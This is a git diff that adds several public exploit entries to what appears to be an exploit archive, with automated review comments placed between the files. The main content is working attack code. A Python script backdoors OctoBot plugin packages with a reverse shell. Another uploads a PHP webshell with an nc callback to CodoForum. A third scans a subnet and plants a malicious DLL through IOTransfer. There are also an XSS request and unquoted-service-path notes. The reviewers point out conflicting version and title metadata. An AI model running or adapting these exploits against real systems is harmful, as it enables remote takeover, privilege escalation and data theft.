diff --git a/exploits/multiple/webapps/50979.py b/exploits/multiple/webapps/50979.py
new file mode 100755
index 000000000..9a9c040e0
--- /dev/null
+++ b/exploits/multiple/webapps/50979.py
@@ -0,0 +1,208 @@
+# Exploit Title: OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)
+# Date: 9/2/2021
+# Exploit Author: Samy Younsi, Thomas Knudsen
+# Vendor Homepage: https://www.octobot.online/
+# Software Link: https://github.com/Drakkar-Software/OctoBot
+# Version: 0.4.0beta3 - 0.4.3
+# Tested on: Linux (Ubuntu, CentOs)
+# CVE : CVE-2021-36711
+
+from __future__ import print_function, unicode_literals
+from bs4 import BeautifulSoup
+import argparse
+import requests
+import zipfile
+import time
+import sys
+import os
+
+def banner():
+ sashimiLogo = """
+ _________ . .
+ (.. \_ , |\ /|
+ \ O \ /| \ \/ /
+ \______ \/ | \ /
+ vvvv\ \ | / |
+ _ _ _ _ \^^^^ == \_/ |
+ | | __ _ | || |__ (_)_ __ ___ (_)`\_ === \. |
+/ __)/ _` / __| '_ \| | '_ ` _ \| |/ /\_ \ / |
+\__ | (_| \__ | | | | | | | | | | ||/ \_ \| /
+( /\__,_( |_| |_|_|_| |_| |_|_| \________/
+ |_| |_| \033[1;91mOctoBot Killer\033[1;m
+Author: \033[1;92mNaqwada\033[1;m
+RuptureFarm 1029
+
+ FOR EDUCATIONAL PURPOSE ONLY.
+ """
+ return print('\033[1;94m{}\033[1;m'.format(sashimiLogo))
+
+
+def help():
+ print('[!] \033[1;93mUsage: \033[1;m')
+ print('[-] python3 {} --RHOST \033[1;92mTARGET_IP\033[1;m --RPORT \033[1;92mTARGET_PORT\033[1;m --LHOST \033[1;92mYOUR_IP\033[1;m --LPORT \033[1;92mYOUR_PORT\033[1;m'.format(sys.argv[0]))
+ print('[-] \033[1;93mNote*\033[1;m If you are using a hostname instead of an IP address please remove http:// or https:// and try again.')
+
+
+def getOctobotVersion(RHOST, RPORT):
+ if RPORT == 443:
+ url = 'https://{}:{}/api/version'.format(RHOST, RPORT)
+ else:
+ url = 'http://{}:{}/api/version'.format(RHOST, RPORT)
+ return curl(url)
+
+
+def restartOctobot(RHOST, RPORT):
+ if RPORT == 443:
+ url = 'https://{}:{}/commands/restart'.format(RHOST, RPORT)
+ else:
+ url = 'http://{}:{}/commands/restart'.format(RHOST, RPORT)
+
+ try:
+ requests.get(url, allow_redirects=False, verify=False, timeout=1)
+ except requests.exceptions.ConnectionError as e:
+ print('[+] \033[1;92mOctoBot is restarting ... Please wait 30 seconds.\033[1;m')
+ time.sleep(30)
+
+
+def downloadTentaclePackage(octobotVersion):
+ print('[+] \033[1;92mStart downloading Tentacle package for OctoBot {}.\033[1;m'.format(octobotVersion))
+ url = 'https://static.octobot.online/tentacles/officials/packages/full/base/{}/any_platform.zip'.format(octobotVersion)
+ result = requests.get(url, stream=True)
+ with open('{}.zip'.format(octobotVersion), 'wb') as fd:
+ for chunk in result.iter_content(chunk_size=128):
+ fd.write(chunk)
+ print('[+] \033[1;92mDownload completed!\033[1;m')
+
+
+def unzipTentaclePackage(octobotVersion):
+ zip = zipfile.ZipFile('{}.zip'.format(octobotVersion))
+ zip.extractall('quests')
+ os.remove('{}.zip'.format(octobotVersion))
+ print('[+] \033[1;92mTentacle package has been extracted.\033[1;m')
+
+
+def craftBackdoor(octobotVersion):
+ print('[+] \033[1;92mCrafting backdoor for Octobot Tentacle Package {}...\033[1;m'.format(octobotVersion))
+ path = 'quests/reference_tentacles/Services/Interfaces/web_interface/api/'
+ injectInitFile(path)
+ injectMetadataFile(path)
+ print('[+] \033[1;92mSashimi malicious Tentacle Package for OctoBot {} created!\033[1;m'.format(octobotVersion))
+
+
+def injectMetadataFile(path):
+ with open('{}metadata.py'.format(path),'r') as metadataFile:
+ content = metadataFile.read()
+ addPayload = content.replace('import json', ''.join('import json\nimport flask\nimport sys, socket, os, pty'))
+ addPayload = addPayload.replace('@api.api.route("/announcements")', ''.join('@api.api.route("/sashimi")\ndef sashimi():\n\ts = socket.socket()\n\ts.connect((flask.request.args.get("LHOST"), int(flask.request.args.get("LPORT"))))\n\t[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]\n\tpty.spawn("/bin/sh")\n\n\n@api.api.route("/announcements")'))
+ with open('{}metadata.py'.format(path),'w') as newMetadataFile:
+ newMetadataFile.write(addPayload)
+
+
+def injectInitFile(path):
+ with open('{}__init__.py'.format(path),'r') as initFile:
+ content = initFile.read()
+ addPayload = content.replace('announcements,', ''.join('announcements,\n\tsashimi,'))
+ addPayload = addPayload.replace('"announcements",', ''.join('"announcements",\n\t"sashimi",'))
+ with open('{}__init__.py'.format(path),'w') as newInitFile:
+ newInitFile.write(addPayload)
+
+
+def rePackTentaclePackage():
+ print('[+] \033[1;92mRepacking Tentacle package.\033[1;m')
+ with zipfile.ZipFile('any_platform.zip', mode='w') as zipf:
+ len_dir_path = len('quests')
+ for root, _, files in os.walk('quests'):
+ for file in files:
+ file_path = os.path.join(root, file)
+ zipf.write(file_path, file_path[len_dir_path:])
+
+
+def uploadMaliciousTentacle():
+ print('[+] \033[1;92mUploading Sashimi malicious Tentacle .ZIP package on anonfiles.com" link="https://app.recordedfuture.com/live/sc/entity/idn:anonfiles.com" style="">anonfiles.com... May take a minute.\033[1;m')
+
+ file = {
+ 'file': open('any_platform.zip', 'rb'),
+ }
+ response = requests.post('https://api.anonfiles.com/upload', files=file, timeout=60)
+ zipLink = response.json()['data']['file']['url']['full']
+ response = requests.get(zipLink, timeout=60)
+ soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
+ zipLink = soup.find(id='download-url').get('href')
+ print('[+] \033[1;92mSashimi malicious Tentacle has been successfully uploaded. {}\033[1;m'.format(zipLink))
+ return zipLink
+
+def curl(url):
+ response = requests.get(url, allow_redirects=False, verify=False, timeout=60)
+ return response
+
+
+def injectBackdoor(RHOST, RPORT, zipLink):
+ print('[+] \033[1;92mInjecting Sashimi malicious Tentacle packages in Ocotobot... May take a minute.\033[1;m')
+ if RPORT == 443:
+ url = 'https://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT)
+ else:
+ url = 'http://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT)
+
+ headers = {
+ 'Content-Type': 'application/json',
+ 'X-Requested-With': 'XMLHttpRequest',
+ }
+
+ data = '{"'+zipLink+'":"register_and_install"}'
+
+ response = requests.post(url, headers=headers, data=data)
+ response = response.content.decode('utf-8').replace('"', '').strip()
+
+ os.remove('any_platform.zip')
+
+ if response != 'Tentacles installed':
+ print('[!] \033[1;91mError: Something went wrong while trying to install the malicious Tentacle package.\033[1;m')
+ exit()
+ print('[+] \033[1;92mSashimi malicious Tentacle package has been successfully installed on the OctoBot target.\033[1;m')
+
+
+def execReverseShell(RHOST, RPORT, LHOST, LPORT):
+ print('[+] \033[1;92mExecuting reverse shell on {}:{}.\033[1;m'.format(LHOST, LPORT))
+ if RPORT == 443:
+ url = 'https://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT)
+ else:
+ url = 'http://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT)
+ return curl(url)
+
+def isPassword(RHOST, RPORT):
+ if RPORT == 443:
+ url = 'https://{}:{}'.format(RHOST, RPORT)
+ else:
+ url = 'http://{}:{}'.format(RHOST, RPORT)
+ return curl(url)
+
+def main():
+ banner()
+ args = parser.parse_args()
+
+ if isPassword(args.RHOST, args.RPORT).status_code != 200:
+ print('[!] \033[1;91mError: This Octobot Platform seems to be protected with a password!\033[1;m')
+
+ octobotVersion = getOctobotVersion(args.RHOST, args.RPORT).content.decode('utf-8').replace('"','').replace('OctoBot ','')
+
+ if len(octobotVersion) > 0:
+ print('[+] \033[1;92mPlatform OctoBot {} detected.\033[1;m'.format(octobotVersion))
+
+ downloadTentaclePackage(octobotVersion)
+ unzipTentaclePackage(octobotVersion)
+ craftBackdoor(octobotVersion)
+ rePackTentaclePackage()
+ zipLink = uploadMaliciousTentacle()
+ injectBackdoor(args.RHOST, args.RPORT, zipLink)
+ restartOctobot(args.RHOST, args.RPORT)
+ execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)
+
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser(description='POC script that exploits the Tentacles upload functionalities on OctoBot. A vulnerability has been found and can execute a reverse shell by crafting a malicious packet. Version affected from 0.4.0b3 to 0.4.0b10 so far.', add_help=False)
+ parser.add_argument('-h', '--help', help=help())
+ parser.add_argument('--RHOST', help="Refers to the IP of the target machine.", type=str, required=True)
+ parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True)
+ parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
+ parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/50976.txt b/exploits/php/webapps/50976.txt
new file mode 100644
index 000000000..807ecfd73
--- /dev/null
+++ b/exploits/php/webapps/50976.txt
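Review bot: `parser.add_argument('-h', '--help', help=help())` in the `__main__` block calls `help()` while the parser is being built, so the usage text is printed on every invocation and the option is registered with `help=None`; because `add_help=False` is set and no `action` is given, `-h` ends up as a value-taking option instead of a help flag. The intended form is `parser.add_argument('-h', '--help', action='help')`, or simply dropping `add_help=False` and the custom `help()`. The metadata also disagrees with itself: the header says `Version: 0.4.0beta3 - 0.4.3` while the parser description says `Version affected from 0.4.0b3 to 0.4.0b10 so far`, and the header's `Exploit Author: Samy Younsi, Thomas Knudsen` differs from the banner's `Author: Naqwada`. Since the header fields are what the index is generated from, these should be reconciled before merge.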
@@ -0,0 +1,43 @@
+# Exploit Title: Magnolia CMS 6.2.19 - Stored Cross-Site Scripting (XSS)
+# Date: 08/05/2022
+# Exploit Author: Giulio Garzia 'Ozozuz'
+# Vendor Homepage: https://www.magnolia-cms.com/
+# Software Link: https://nexus.magnolia-cms.com/service/local/repositories/magnolia.public.releases/content/info/magnolia/bundle/magnolia-community-demo-webapp/6.2.19/magnolia-community-demo-webapp-6.2.19-tomcat-bundle.zip
+# Version: 6.2.19
+# Tested on: Linux, Windows, Docker
+# CVE : CVE-2022-33098
+
+Explanation
+Malicious user with the permissions to upload profile picture for a contact, can upload an SVG file containing malicious JavaScript code that will be executed by anyone opening the malicious resource.
+
+===== REQUEST =====
+POST /magnoliaAuthor/.magnolia/admincentral/APP/UPLOAD/0/140/action/cba61868-b27a-4d50-983d-adf48b992be1 HTTP/1.1
+Host: 127.0.0.1:8080
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------399178799522967017241464837908
+Content-Length: 620
+Connection: close
+Cookie: csrf=_WLVhBj-Vv-sdc37C4GBahMJ1tPS_7o_Y1VCEEw18Ks; JSESSIONID=F2678A586264F811C2746E4138BEF34D
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: iframe
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+
+-----------------------------399178799522967017241464837908
+Content-Disposition: form-data; name="140_file"; filename="xss.svg"
+Content-Type: image/svg+xml
+
+
+
+
+
+
+
+
+
+-----------------------------399178799522967017241464837908--
\ No newline at end of file
diff --git a/exploits/php/webapps/50978.py b/exploits/php/webapps/50978.py
new file mode 100755
index 000000000..58b356602
--- /dev/null
+++ b/exploits/php/webapps/50978.py
@@ -0,0 +1,89 @@
+# Exploit Title: CodoForum v5.1 - Remote Code Execution (RCE)
+# Date: 06/07/2022
+# Exploit Author: Krish Pandey (@vikaran101)
+# Vendor Homepage: https://codoforum.com/
+# Software Link: https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip
+# Version: CodoForum v5.1
+# Tested on: Ubuntu 20.04
+# CVE: CVE-2022-31854
+
+#!/usr/bin/python3
+
+import requests
+import time
+import optparse
+import random
+import string
+
+banner = """
+ ______ _______ ____ ___ ____ ____ _____ _ ___ ____ _ _
+ / ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ // |( _ ) ___|| || |
+| | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \| |/ _ \___ \| || |_
+| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) | | (_) |__) |__ _|
+ \____| \_/ |_____| |_____|\___/_____|_____| |____/|_|\___/____/ |_|
+"""
+
+print("\nCODOFORUM V5.1 ARBITRARY FILE UPLOAD TO RCE(Authenticated)")
+print(banner)
+print("\nExploit found and written by: @vikaran101\n")
+
+parser = optparse.OptionParser()
+parser.add_option('-t', '--target-url', action="store", dest='target', help='path of the CodoForum v5.1 install')
+parser.add_option('-u', '--username', action="store", dest='username', help='admin username')
+parser.add_option('-p', '--password', action="store", dest='password', help='admin password')
+parser.add_option('-i', '--listener-ip', action="store", dest='ip', help='listener address')
+parser.add_option('-n', '--port', action="store", dest='port', help='listener port number')
+
+options, args = parser.parse_args()
+
+proxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
+
+if not options.target or not options.username or not options.password or not options.ip or not options.port:
+ print("[-] Missing arguments!")
+ print("[*] Example usage: ./exploit.py -t [target url] -u [username] -p [password] -i [listener ip] -n [listener port]")
+ print("[*] Help menu: ./exploit.py -h OR ./exploit.py --help")
+ exit()
+
+loginURL = options.target + '/admin/?page=login'
+globalSettings = options.target + '/admin/index.php?page=config'
+payloadURL = options.target + '/sites/default/assets/img/attachments/'
+
+session = requests.Session()
+
+randomFileName = ''.join((random.choice(string.ascii_lowercase) for x in range(10)))
+
+def getPHPSESSID():
+
+ try:
+ get_PHPID = session.get(loginURL)
+ headerDict = get_PHPID.headers
+ cookies = headerDict['Set-Cookie'].split(';')[0].split('=')[1]
+ return cookies
+ except:
+ exit()
+
+phpID = getPHPSESSID()
+
+def login():
+ send_cookies = {'cf':'0'}
+ send_headers = {'Host': loginURL.split('/')[2], 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':'en-US,en;q=0.5','Accept-Encoding':'gzip, deflate','Content-Type':'multipart/form-data; boundary=---------------------------2838079316671520531167093219','Content-Length':'295','Origin':loginURL.split('/')[2],'Connection':'close','Referer':loginURL,'Upgrade-Insecure-Requests':'1'}
+ send_creds = "-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"username\"\n\nadmin\n-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"password\"\n\nadmin\n-----------------------------2838079316671520531167093219--"
+ auth = session.post(loginURL, headers=send_headers, cookies=send_cookies, data=send_creds, proxies=proxy)
+
+ if "CODOFORUM | Dashboard" in auth.text:
+ print("[+] Login successful")
+
+def uploadAndExploit():
+ send_cookies = {'cf':'0', 'user_id':'1', 'PHPSESSID':phpID}
+ send_headers = {'Content-Type':'multipart/form-data; boundary=---------------------------7450086019562444223451102689'}
+ send_payload = '\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_title"\n\nCODOLOGIC\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_description"\n\ncodoforum - Enhancing your forum experience with next generation technology!\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="admin_email"\n\nadmin@codologic.com\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="default_timezone"\n\nEurope/London\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="register_pass_min"\n\n8\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_all_topics"\n\n30\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_cat_topics"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_per_topic"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_path"\n\nassets/img/attachments\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_exts"\n\njpg,jpeg,png,gif,pjpeg,bmp,txt\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_size"\n\n3\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_mimetypes"\n\nimage/*,text/plain\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_num"\n\n5\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_len"\n\n15\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="reply_min_chars"\n\n10\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="insert_oembed_videos"\n\nyes\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_privacy"\n\neveryone\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="approval_notify_mails"\n\n\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_header_menu"\n\nsite_title\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_logo"; filename="' + randomFileName + '.php"\nContent-Type: application/x-php\n\n&1|nc ' + options.ip + ' ' + options.port + ' >/tmp/f");?> \n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="login_by"\n\nUSERNAME\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="force_https"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="user_redirect_after_login"\n\ntopics\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_hide_topic_messages"\n\noff\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_infinite_scrolling"\n\non\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="show_sticky_topics_without_permission"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="CSRF_token"\n\n23cc3019cadb6891ebd896ae9bde3d95\n-----------------------------7450086019562444223451102689--\n'
+ exploit = requests.post(globalSettings, headers=send_headers, cookies=send_cookies, data=send_payload, proxies=proxy)
+
+ print("[*] Checking webshell status and executing...")
+ payloadExec = session.get(payloadURL + randomFileName + '.php', proxies=proxy)
+ if payloadExec.status_code == 200:
+ print("[+] Payload uploaded successfully and executed, check listener")
+ else:
+ print("[-] Something went wrong, please try uploading the shell manually(admin panel > global settings > change forum logo > upload and access from " + payloadURL +"[file.php])")
+login()
+uploadAndExploit()
\ No newline at end of file
diff --git a/exploits/windows/local/50975.txt b/exploits/windows/local/50975.txt
new file mode 100644
index 000000000..fe4e76520
--- /dev/null
+++ b/exploits/windows/local/50975.txt
@@ -0,0 +1,22 @@
+# Exploit Title: Kite 1.2021.610.0 - Unquoted Service Path
+# Date: 2020-11-6
+# Exploit Author: Ghaleb Al-otaibi
+# Vendor Homepage: https://www.kite.com/
+# Version: Version 4.2.0.1 U1
+# Tested on: Microsoft Windows 10 Pro - 10.0.19044 N/A Build 19044
+# CVE : NA
+
+# Service info:
+C:\Windows\system32\cmd.exe>sc qc KiteService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: KiteService
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 0 IGNORE
+ BINARY_PATH_NAME : C:\Program Files\Kite\KiteService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : KiteService
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/50977.txt b/exploits/windows/local/50977.txt
new file mode 100644
index 000000000..88fc85649
--- /dev/null
+++ b/exploits/windows/local/50977.txt
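Review bot: The `#!/usr/bin/python3` shebang is placed on line 10, below the comment header, where the loader ignores it — a shebang is only honoured as the very first line — so the `100755` mode given in the file header does not make the script directly executable; it should move above `# Exploit Title:`. `getPHPSESSID()` wraps its whole body in a bare `except:` that calls `exit()` without a message, which hides whether the failure was a connection error, a missing `Set-Cookie` header, or an unexpected cookie format; catching `requests.RequestException` and `(KeyError, IndexError)` separately and printing the reason would make failures diagnosable. `import time` is never used and can be dropped.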
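Review bot: The header's `Version: Version 4.2.0.1 U1` does not match the title `Kite 1.2021.610.0`, and `Date: 2020-11-6` predates the 1.2021.x build named in the title, so at least one of these fields is wrong; the index row added in `files_exploits.csv` carries the title's version, so the header is what needs correcting. The `sc qc` output itself is consistent with the claim (`BINARY_PATH_NAME : C:\Program Files\Kite\KiteService.exe` is unquoted and contains a space, `START_TYPE : 2 AUTO_START`, `SERVICE_START_NAME : LocalSystem`). A one-line remediation note — quote the binary path in the service configuration — would make the advisory directly actionable for defenders.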
@@ -0,0 +1,48 @@
+# Exploit Title: Dr. Fone v4.0.8- 'net_updater32.exe' Unquoted Service Path
+# Discovery Date: 2022-05-07
+# Discovery by: Esant1490
+# Vendor Homepage: https://drfone.wondershare.net
+# Software Link : https://download.wondershare.net/drfone_full4008.exe
+# Tested Version: 4.0.8
+# Tested on OS: Windows 10 Pro x64 en
+# Vulnerability Type: Unquoted Service Path
+
+# Find the discover Unquoted Service Path Vulnerability:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "C:\Windows\\" |findstr /i /v """
+
+Wondershare Install Assist Service Wondershare InstallAssist
+C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto
+
+Wondershare Application Framework Service WsAppService C:\Program Files
+(x86)\Wondershare\WAF\2.4.3.243\WsAppService.exe Auto
+Wondershare Application Update Service 3.0
+
+WsAppService3 C:\Program Files
+(x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe Auto
+
+Wondershare Driver Install Service WsDrvInst C:\Program Files
+(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe Auto
+
+# Service info:
+
+C:\>sc qc WsDrvInst
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: WsDrvInst
+TIPO : 10 WIN32_OWN_PROCESS
+TIPO_INICIO : 2 AUTO_START
+CONTROL_ERROR : 1 NORMAL
+NOMBRE_RUTA_BINARIO: C:\Program Files
+(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe
+GRUPO_ORDEN_CARGA :
+ETIQUETA : 0
+NOMBRE_MOSTRAR : Wondershare Driver Install Service
+DEPENDENCIAS : RPCSS
+NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+A successful attempt to exploit this vulnerability could allow to execute
+code during startup or reboot with the elevated privileges.
\ No newline at end of file
diff --git a/exploits/windows/remote/50974.py b/exploits/windows/remote/50974.py
new file mode 100755
index 000000000..728ffc1b0
--- /dev/null
+++ b/exploits/windows/remote/50974.py
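Review bot: The title names `'net_updater32.exe'`, but nothing in the body mentions that binary: the `wmic` listing and the `sc qc WsDrvInst` output both point at `C:\Program Files (x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe`, and the row added to `files_exploits.csv` repeats the title. Either the title should name `DriverInstall.exe` / `WsDrvInst`, or the `sc qc` output for the service that actually runs `net_updater32.exe` should be added. The `#Exploit:` paragraph is generic; stating which of the three listed services were verified and adding the remediation (quote the binary paths in the service configuration) would make the advisory useful to defenders.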
@@ -0,0 +1,190 @@
+# Exploit Title: IOTransfer V4 – Remote Code Execution (RCE)
+# Date: 06/22/2022
+# Exploit Author: Tomer Peled
+# Vendor Homepage: https://www.iobit.com
+# Software Link: https://iotransfer.itopvpn.com/
+# Version: V4 and onward
+# Tested on: Windows 10
+# CVE : 2022-24562
+# References: https://github.com/tomerpeled92/CVE/tree/main/CVE-2022%E2%80%9324562
+
+import os
+from urllib3.exceptions import ConnectTimeoutError
+from win32com.client import *
+import requests
+import json
+
+localPayloadPath = r"c:\temp\malicious.dll"
+remotePayloadPath="../Program Files (x86)/Google/Update/goopdate.dll"
+remoteDownloadPath = r'C:\Users\User\Desktop\obligationservlet.pdf'
+Range = "192.168.89"
+UpOrDown="Upload"
+IP = ""
+UserName = ""
+
+def get_version_number(file_path):
+ information_parser = Dispatch("Scripting.FileSystemObject")
+ version = information_parser.GetFileVersion(file_path)
+ return version
+
+
+def getTaskList(IP, taskid=""):
+ print("Getting task list...")
+ url = f'http://{IP}:7193/index.php?action=gettasklist&userid=*'
+ res = requests.get(url)
+ tasks = json.loads(res.content)
+ tasks = json.loads(tasks['content'])
+ for task in tasks['tasks']:
+ if taskid == task['taskid']:
+ print(f"Task ID found: {taskid}")
+
+
+def CreateUploadTask(IP):
+ SetSavePath(IP)
+ url = f'http://{IP}:7193/index.php?action=createtask'
+ task = {
+ 'method': 'get',
+ 'version': '1',
+ 'userid': '*',
+ 'taskstate': '0',
+ }
+ res = requests.post(url, json=task)
+ task = json.loads(res.content)
+ task = json.loads(task['content'])
+ taskid = task['taskid']
+ print(f"[*] TaskID: {taskid}")
+ return taskid
+
+
+def CreateUploadDetailNode(IP, taskid, remotePath, size='100'):
+ url = f'http://{IP}:7193/index.php?action=settaskdetailbyindex&userid=*&taskid={taskid}&index=0'
+ file_info = {
+ 'size': size,
+ 'savefilename': remotePath,
+ 'name': remotePath,
+ 'fullpath': r'c:\windows\system32\calc.exe',
+ 'md5': 'md5md5md5md5md5',
+ 'filetype': '3',
+ }
+ res = requests.post(url, json=file_info)
+ js = json.loads(res.content)
+ print(f"[V] Create Detail returned: {js['code']}")
+
+
+def readFile(Path):
+ file = open(Path, "rb")
+ byte = file.read(1)
+ next = "Start"
+ while next != b'':
+ byte = byte + file.read(1023)
+ next = file.read(1)
+ if next != b'':
+ byte = byte + next
+ file.close()
+ return byte
+
+
+def CallUpload(IP, taskid, localPayloadPath):
+ url = f'http://{IP}:7193/index.php?action=newuploadfile&userid=*&taskid={taskid}&index=0'
+ send_data = readFile(localPayloadPath)
+ try:
+ res = requests.post(url, data=send_data)
+ js = json.loads(res.content)
+ if js['code'] == 200:
+ print("[V] Success payload uploaded!")
+ else:
+ print(f"CreateRemoteFile: {res.content}")
+ except:
+ print("[*] Reusing the task...")
+ res = requests.post(url, data=send_data)
+ js = json.loads(res.content)
+ if js['code'] == 200 or "false" in js['error']:
+ print("[V] Success payload uploaded!")
+ else:
+ print(f"[X] CreateRemoteFile Failed: {res.content}")
+
+
+def SetSavePath(IP):
+ url = f'http://{IP}:7193/index.php?action=setiotconfig'
+ config = {
+ 'tasksavepath': 'C:\\Program '
+ }
+ requests.post(url, json=config)
+
+def ExploitUpload(IP,payloadPath,rPath,taskid =None):
+ if not taskid:
+ taskid = CreateUploadTask(IP)
+ size = os.path.getsize(payloadPath)
+ CreateUploadDetailNode(IP, taskid, remotePath=rPath, size=str(size))
+ CallUpload(IP, taskid, payloadPath)
+
+
+def CreateDownloadTask(IP, Path) -> str:
+ url = f'http://{IP}:7193/index.php?action=createtask'
+ task = {
+ 'method': 'get',
+ 'version': '1',
+ 'userid': '*',
+ 'taskstate': '0',
+ 'filepath': Path
+ }
+ res = requests.post(url, json=task)
+ task = json.loads(res.content)
+ task = json.loads(task['content'])
+ taskid = task['taskid']
+ print(f"TaskID: {taskid}")
+ return taskid
+
+
+def ExploitDownload(IP, DownloadPath, ID=None):
+ if ID:
+ url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={ID}'
+ else:
+ taskid = CreateDownloadTask(IP, DownloadPath)
+ url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={taskid}'
+ res = requests.get(url)
+ return res
+
+def ScanIP(startRange):
+ print("[*] Searching for vulnerable IPs", end='')
+ Current = 142
+ IP = f"{startRange}.{Current}"
+ VulnerableIP: str = ""
+ UserName: str = ""
+ while Current < 252:
+ print(".", end='')
+ url = f'http://{IP}:7193/index.php?action=getpcname&userid=*'
+ try:
+ res = requests.get(url, timeout=1)
+ js = json.loads(res.content)
+ js2 = json.loads(js['content'])
+ UserName = js2['name']
+ VulnerableIP=IP
+ print(f"\n[V] Found a Vulnerable IP: {VulnerableIP}")
+ print(f"[!] Vulnerable PC username: {UserName}")
+ return VulnerableIP,UserName
+ except Exception as e:
+ pass
+ except ConnectTimeoutError:
+ pass
+ IP = f"{startRange}.{Current}"
+ Current = Current + 1
+ return None,None
+
+
+if __name__ == '__main__':
+ IP,UserName = ScanIP(Range)
+ if IP is None or UserName is None:
+ print("[X] No vulnerable IP found")
+ exit()
+ print("[*] Starting Exploit...")
+ if UpOrDown == "Upload":
+ print(f"[*]Local Payload Path: {localPayloadPath}")
+ print(f"[*]Remote Upload Path: {remotePayloadPath}")
+ ExploitUpload(IP,localPayloadPath,remotePayloadPath)
+ elif UpOrDown == "Download":
+ print(f"[*] Downloading the file: {remoteDownloadPath}")
+ res = ExploitDownload(IP, remoteDownloadPath)
+ file = open("out.pdf", "wb+")
+ file.write(res.content)
+ file.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index d3325a88f..e9500bdaf 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
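Review bot: In `ScanIP`, `except ConnectTimeoutError: pass` is unreachable because the preceding `except Exception as e: pass` already catches it (it is an `Exception` subclass), and the bound `e` is never used; drop the dead clause and narrow the remaining handler to `(requests.RequestException, ValueError, KeyError)` so genuine bugs are not silenced. The header's `# CVE : 2022-24562` is missing the `CVE-` prefix that the other files in this commit and the referenced URL use. `get_version_number` is defined but never called and is the only consumer of `from win32com.client import *`; either remove both or replace the wildcard with `from win32com.client import Dispatch`. `readFile` re-implements a whole-file read in 1023-byte steps with a local named `next` that shadows the builtin; `with open(Path, "rb") as f: return f.read()` is equivalent and also closes the handle if `read` raises.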
